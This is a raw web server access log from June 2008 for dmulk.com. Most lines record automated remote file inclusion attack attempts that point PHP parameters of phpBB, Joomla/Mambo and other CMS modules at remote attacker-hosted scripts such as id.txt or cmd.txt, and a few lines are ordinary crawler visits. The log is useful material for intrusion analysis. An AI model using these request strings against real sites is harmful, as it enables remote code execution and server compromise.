64.118.88.84 - - [11/Jun/2008:12:38:51 -0700] "GET /logs/modules/Forums/admin/admin_smilies.php?phpbb_root_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
201.130.79.73 - - [11/Jun/2008:12:39:02 -0700] "GET /logs/access_080117.log//modules/My_eGallery/index.php?basepath=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.98.224.22 - - [11/Jun/2008:12:39:35 -0700] "GET /logs/access_080312.log//errors.php?error=http://purukcahu.sitesled.com/borneo/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.179.180.45 - - [11/Jun/2008:12:40:02 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:12:40:05 -0700] "GET /shop.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:12:40:05 -0700] "GET /logs/shop.php?root=http://homert.100webspace.net/doc/flo1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:12:40:06 -0700] "GET /shop.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
210.112.170.41 - - [11/Jun/2008:12:40:06 -0700] "GET /logs/shop.php?root=http://www.acadie-contest.com/cmd.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:12:40:08 -0700] "GET /retreat1/webcam/?S=A HTTP/1.0" 200 196254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
202.179.180.45 - - [11/Jun/2008:12:40:09 -0700] "GET / HTTP/1.1" 200 18257 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "www.dmulk.com"
61.247.192.15 - - [11/Jun/2008:12:40:20 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" "dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:40:36 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:41:02 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:41:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:41:06 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:41:06 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:41:06 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:41:07 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:12:41:13 -0700] "GET /retreat1/webcam/?S=A HTTP/1.0" 200 196254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:41:16 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:41:16 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:41:16 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:41:34 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:41:34 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:41:34 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
81.235.34.19 - - [11/Jun/2008:12:41:40 -0700] "GET /logs/access_080501.log//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.34.19 - - [11/Jun/2008:12:41:40 -0700] "GET //index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.235.34.19 - - [11/Jun/2008:12:41:41 -0700] "GET /logs//index2.php?content=http://www.schmid-telecom.com/privz.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:41:41 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.indigonetzwerk.de/mambo/editor/id1? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:42:03 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:12:42:18 -0700] "GET /logs/administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:12:42:18 -0700] "GET /administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:12:42:18 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:12:42:18 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:12:42:23 -0700] "GET /retreat1/webcam/?S=A HTTP/1.0" 200 196254 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:43:03 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
207.218.234.146 - - [11/Jun/2008:12:43:03 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:43:05 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:43:05 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:43:05 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:12:43:20 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:12:43:20 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:12:43:22 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:12:43:23 -0700] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
89.108.64.152 - - [11/Jun/2008:12:43:23 -0700] "GET //include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:12:43:23 -0700] "GET /logs/?custompluginfile[]=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 200 51417 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
84.246.21.79 - - [11/Jun/2008:12:43:24 -0700] "GET /?custompluginfile[]=http://intunetodoom.com/zerocool/id.txt?? HTTP/1.1" 200 18409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:43:26 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:43:26 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:12:43:37 -0700] "GET /logs/scanhttp://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:12:43:37 -0700] "GET /scanhttp://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:44:29 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.aeromexicov.org/galeria/backups/31337.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:12:44:49 -0700] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "dmulk.com"
67.19.197.98 - - [11/Jun/2008:12:44:50 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:45:48 -0700] "GET /logs/config.php?path_to_root=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:45:48 -0700] "GET /logs/config.php?path_to_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:45:48 -0700] "GET /config.php?path_to_root=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:12:45:48 -0700] "GET /config.php?path_to_root=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:12:45:50 -0700] "GET /logs/data/compatible.php?module_name=http://www.geocities.com/mirza.putri/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:12:45:50 -0700] "GET /data/compatible.php?module_name=http://www.geocities.com/mirza.putri/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:12:46:01 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:12:46:11 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.200 - - [11/Jun/2008:12:46:11 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.injoyusa.com/on.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:46:17 -0700] "GET /logs/access_080209.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:46:17 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:46:17 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:12:46:21 -0700] "GET /data/compatible.php?module_name=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
67.19.197.98 - - [11/Jun/2008:12:46:22 -0700] "GET /logs/data/compatible.php?module_name=http://www.geocities.com/vianarina/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:12:46:28 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:12:46:33 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:46:35 -0700] "GET /logs/access_080124.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:46:37 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:46:37 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
212.227.251.172 - - [11/Jun/2008:12:46:38 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.18.247 - - [11/Jun/2008:12:46:45 -0700] "GET /logs/access_080206.log HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.236.111.227 - - [11/Jun/2008:12:47:37 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://tugaspeed.info/system.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:47:43 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:47:43 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:47:44 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.80.245.245 - - [11/Jun/2008:12:47:47 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:47:50 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:47:53 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:47:53 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.98.71 - - [11/Jun/2008:12:47:53 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:47:54 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:12:47:54 -0700] "GET /logs/access_080418.log//index.php?mosConfig_absolute_path=http://fsm.upsi.edu.my/db/31337.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.106.98.71 - - [11/Jun/2008:12:47:54 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [11/Jun/2008:12:47:54 -0700] "GET /logs/access_080309.log//include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [11/Jun/2008:12:47:55 -0700] "GET //include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.64.152 - - [11/Jun/2008:12:47:55 -0700] "GET /logs//include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:47:57 -0700] "GET /logs/access_071230.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.108.64.152 - - [11/Jun/2008:12:48:00 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://loveyou-love.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:48:08 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:48:08 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:48:12 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.101.24 - - [11/Jun/2008:12:48:13 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:48:36 -0700] "GET /logs/access.log/index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.174.65.190 - - [11/Jun/2008:12:48:36 -0700] "GET /logs/access_080103.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.exacta-learning.com//images/.bash/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:48:39 -0700] "GET /index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:48:40 -0700] "GET /logs/index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:48:52 -0700] "GET /logs/access.log/modules/My_eGallery/index.php?basepath=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:48:52 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:12:48:52 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:48:53 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:48:53 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:48:53 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:49:02 -0700] "GET /logs/access_080310.log//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:49:02 -0700] "GET //components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:49:02 -0700] "GET /logs//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:49:05 -0700] "GET /logs/index.php?modulo=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:49:06 -0700] "GET /index.php?modulo=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 18399 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:49:14 -0700] "GET /logs/index.php?pagina=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:49:14 -0700] "GET /index.php?pagina=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 200 18399 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:12:49:15 -0700] "GET /logs/access_080226.log//components/com_calendar.php?absolute_path=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.240.146 - - [11/Jun/2008:12:49:19 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://powderpuffsquad.com//images/press/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.67.202.19 - - [11/Jun/2008:12:49:25 -0700] "GET /index.php?option=com_custompages&cpage=http://melangemag.com/amember/plugins/payment/eway/ec.txt? HTTP/1.1" 200 18503 "-" "libwww-perl/5.68" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:12:49:27 -0700] "GET /logs/access.log/index.php?pg=http://Sin1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
